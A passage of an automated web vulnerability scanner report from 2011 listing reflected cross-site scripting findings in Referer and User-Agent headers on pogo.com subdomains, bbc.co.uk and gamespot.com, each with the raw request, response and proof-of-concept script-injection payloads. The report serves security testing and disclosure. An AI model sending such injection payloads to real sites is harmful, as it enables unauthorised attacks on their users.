GET /room/loading/jvmtest.jsp Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10a4313"><script>alert(1)< Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:15:37 GMT Server: Apache-Coyote/1.1 Content-Length: 1414 <html> <script type="text/javascript"> function show(dest) { if (top.window.opener) { top.window.opener top.window.close(); } else { top.window. ...[SNIP]... <param name="browserInfo" value="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10a4313"><script>alert(1)< ...[SNIP]... |
3.646. http://game3.pogo.com/room/loading/loading.jsp [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /room/loading/loading.jsp |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57849</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /room/loading/loading.jsp HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 Referer: http://www.google.com |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Type: text/html;charset=UTF-8 Content-Length: 4179 Date: Sun, 09 Jan 2011 02:14:53 GMT Server: Apache-Coyote/1.1 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head> <title> Pogo: Address Messed Up </title> ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="ERROR: Address Messed Up Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:error: s.prop8="Non Authenticated"; ...[SNIP]... |
3.647. http://game3.pogo.com/room/loading/loading.jsp [User-Agent HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /room/loading/loading.jsp |
Issue detail
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c728b</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /room/loading/loading.jsp Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c728b</script><script Connection: close Cookie: com.pogo.unid=660648 |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:14:58 GMT Server: Apache-Coyote/1.1 Content-Length: 1859 <html> <body> <script language="javascript"> function setVisible(elementName, visible) { elementToChangeState = getElementReference //alert('found element ...[SNIP]... <param name="browserInfo" value="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c728b</script><script ...[SNIP]... |
3.648. http://game3.pogo.com/room/loading/loading.jsp [User-Agent HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /room/loading/loading.jsp |
Issue detail
The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73c5e"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /room/loading/loading.jsp Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: 73c5e"><script>alert(1)< Connection: close Cookie: com.pogo.unid=660648 |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:14:55 GMT Server: Apache-Coyote/1.1 Content-Length: 1710 <html> <body> <script language="javascript"> function setVisible(elementName, visible) { elementToChangeState = getElementReference //alert('found element ...[SNIP]... <param name="browserInfo" value="73c5e"><script>alert(1)< ...[SNIP]... |
3.649. http://game3.pogo.com/room/util/urlopen.jsp [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /room/util/urlopen.jsp |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d25a</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /room/util/urlopen.jsp HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 Referer: http://www.google.com |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Type: text/html;charset=UTF-8 Content-Length: 4179 Date: Sun, 09 Jan 2011 02:15:21 GMT Server: Apache-Coyote/1.1 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head> <title> Pogo: Address Messed Up </title> ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="ERROR: Address Messed Up Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:error: s.prop8="Non Authenticated"; ...[SNIP]... |
3.650. http://game3.pogo.com/util/client-props.jsp [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /util/client-props.jsp |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c14fe</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /util/client-props.jsp HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 Referer: http://www.google.com |
Response
HTTP/1.1 400 Expires: 0 Cache-Control: max-age=0, private Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:16:00 GMT Server: Apache-Coyote/1.1 Connection: close Content-Length: 4179 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head> <title> Pogo: Address Messed Up </title> ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="ERROR: Address Messed Up Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:error: s.prop8="Non Authenticated"; ...[SNIP]... |
3.651. http://game3.pogo.com/v/11.1.9.13/applet/scrabble/ [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /v/11.1.9.13/applet |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a972b</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /v/11.1.9.13/applet Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 Referer: http://www.google.com |
Response
HTTP/1.1 404 /applet/scrabble/ Expires: 0 Cache-Control: max-age=0, private Content-Type: text/html Date: Sun, 09 Jan 2011 02:15:28 GMT Server: Apache-Coyote/1.1 Content-Length: 3799 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head> <title> Pogo: Error: Invalid URL </title> ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="ERROR: Invalid URL Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:error: s.prop8="Non Authenticated"; if (typeof( ...[SNIP]... |
3.652. http://game3.pogo.com/v/11.1.9.44/applet/jvmtest/ [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /v/11.1.9.44/applet |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10ba1</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /v/11.1.9.44/applet Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 Referer: http://www.google.com |
Response
HTTP/1.1 404 /applet/jvmtest/ Expires: 0 Cache-Control: max-age=0, private Content-Type: text/html Date: Sun, 09 Jan 2011 02:15:27 GMT Server: Apache-Coyote/1.1 Content-Length: 3799 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head> <title> Pogo: Error: Invalid URL </title> ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="ERROR: Invalid URL Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:error: s.prop8="Non Authenticated"; if (typeof( ...[SNIP]... |
3.653. http://puzzle-games.pogo.com/ [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://puzzle-games.pogo |
Path: | / |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7208c</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET / HTTP/1.1 Host: puzzle-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=F3495FAC3BB Content-Language: en-US Set-Cookie: com.pogo.unid=660625 Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:25:48 GMT Server: Apache-Coyote/1.1 Content-Length: 106833 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="Unauth Category Page filter - puzzle"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo s.prop ...[SNIP]... |
3.654. http://puzzle-games.pogo.com/games/bejeweled2 [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://puzzle-games.pogo |
Path: | /games/bejeweled2 |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4af4</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /games/bejeweled2 HTTP/1.1 Host: puzzle-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: no-cache, no-store Set-Cookie: prod.JID=BDDA3B3FFD3 Content-Language: en-US Set-Cookie: com.pogo.unid=660641 Pragma: no-cache Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:25:51 GMT Server: Apache-Coyote/1.1 Content-Length: 37791 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="Pogo Unauth o110272767 Log In Page"; s.prop2="pogo"; s.channel="games"; s.prop7="POGO:games:: s.prop8="Non Authenti ...[SNIP]... |
3.655. http://rss.pogo.com/rss [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://rss.pogo.com |
Path: | /rss |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb427</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /rss HTTP/1.1 Host: rss.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
Response
HTTP/1.1 404 /rss Expires: 0 Cache-Control: max-age=0, private Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:26:15 GMT Server: Apache-Coyote/1.1 Content-Length: 3799 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head> <title> Pogo: Error: Invalid URL </title> ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="ERROR: Invalid URL Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:error: s.prop8="Non Authenticated"; if (typeof( ...[SNIP]... |
3.656. http://word-games.pogo.com/ [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://word-games.pogo |
Path: | / |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 538ca</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /?pageSection=footer_word HTTP/1.1 Host: word-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 Referer: http://www.google.com |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:29:31 GMT Server: Apache-Coyote/1.1 Content-Length: 106184 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="Unauth Category Page filter - word"; s.prop2="pogo"; s.channel="pogo"; s.eVar18="un_footer_word" s.prop7="POGO:pogo ...[SNIP]... |
3.657. http://word-games.pogo.com/games/scrabble [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://word-games.pogo |
Path: | /games/scrabble |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68e47</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /games/scrabble HTTP/1.1 Host: word-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 Referer: http://www.google.com |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:29:22 GMT Server: Apache-Coyote/1.1 Content-Length: 19628 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="Unknown Country Room Selector Page"; s.prop2="pogo"; s.channel="games"; s.prop7="POGO:games s.prop8=" ...[SNIP]... |
3.658. http://word-games.pogo.com/games/scrabble [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://word-games.pogo |
Path: | /games/scrabble |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9960f</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /games/scrabble Host: word-games.pogo.com Proxy-Connection: keep-alive Referer: http://www.google.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:31:59 GMT Server: Apache-Coyote/1.1 Content-Length: 19736 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="Unknown Country Room Selector Page"; s.prop2="pogo"; s.channel="games"; s.eVar18="un_free_home s.prop7="POGO:games ...[SNIP]... |
3.659. http://www.bbc.co.uk/news/technology-12126880 [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.bbc.co.uk |
Path: | /news/technology-12126880 |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c325'-alert(1)-This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /news/technology-12126880 HTTP/1.1 Host: www.bbc.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: max-age=0 Content-Type: text/html Date: Sun, 09 Jan 2011 01:39:11 GMT Keep-Alive: timeout=10, max=798 Expires: Sun, 09 Jan 2011 01:39:11 GMT Connection: close Set-Cookie: BBC-UID=54edf269c181 Set-Cookie: BBC-UID=54edf269c181 Content-Length: 58681 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp <html xmlns="http://www.w3.org ...[SNIP]... <!-- bbc.fmtj.page = { serverTime: 1294537151000, editionToServe: 'us', queryString: null, referrer: 'http://www.google.com section: 'technology', sectionPath: '/Technology', siteName: 'BBC News', siteToServe: 'news', siteVersion: 'cream', storyId: '12126880', assetType: 'story', uri: '/news/techn ...[SNIP]... |
3.660. http://www.gamespot.com/ [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Firm |
Host: | http://www.gamespot.com |
Path: | / |
Issue detail
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3db8c"><a>32f7510c149 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: 3db8c"><a>32f7510c149 |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:44:47 GMT Server: Apache Accept-Ranges: bytes X-Powered-By: PHP/5.2.5 Set-Cookie: geolocn=MTczLjE5My4y Set-Cookie: ctk=NGQyOTEzMGZhZGMx Set-Cookie: gspot_promo_010811=1; expires=Wed, 12-Jan-2011 01:44:47 GMT; path=/; domain=.gamespot.com Set-Cookie: gspot_side_010811=1; expires=Wed, 12-Jan-2011 01:44:47 GMT; path=/; domain=.gamespot.com Set-Cookie: hello_from_gs=1; path=/; domain=.gamespot.com Keep-Alive: timeout=300, max=967 Connection: Keep-Alive Content-Type: text/html; charset=ISO-8859-1 Content-Length: 100485 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... &ASSET_HOST=adimg ...[SNIP]... |
3.661. http://www.pogo.com/ [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | / |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7731c</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET / HTTP/1.1 Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.google.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response (redirected)
